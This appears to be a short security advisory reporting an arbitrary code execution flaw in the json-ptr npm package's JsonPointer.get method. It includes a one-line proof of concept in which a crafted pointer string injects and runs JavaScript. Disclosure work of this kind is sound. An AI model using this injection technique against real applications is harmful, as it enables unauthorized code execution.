json-ptr

vulnerability arbitrary code execution
severity 8.6
language typescript
registry npm

✍️ Description

json-ptr is a complete implementation of JSON Pointer (RFC 6901) for nodejs and modern browsers.

JsonPointer.get that is designed to get the target object's value at the pointer's location is vulnerable to arbitrary code injection and exection, mainly due to the lack of sanitizing for user's inputs of the pointer's location.

🕵️‍♂️ Proof of Concept

// PoC.js
jptr=require('json-ptr');
JsonPointer=jptr.JsonPointer;
JsonPointer.get({}, '/aaa\'\]\)\) !== \'undefined\') \{return it;\}; console.log(\'HACKED\'); if((([\'a'); // HACKED

💥 Impact

This vulnerability is capable of executing arbitrary js codes.

References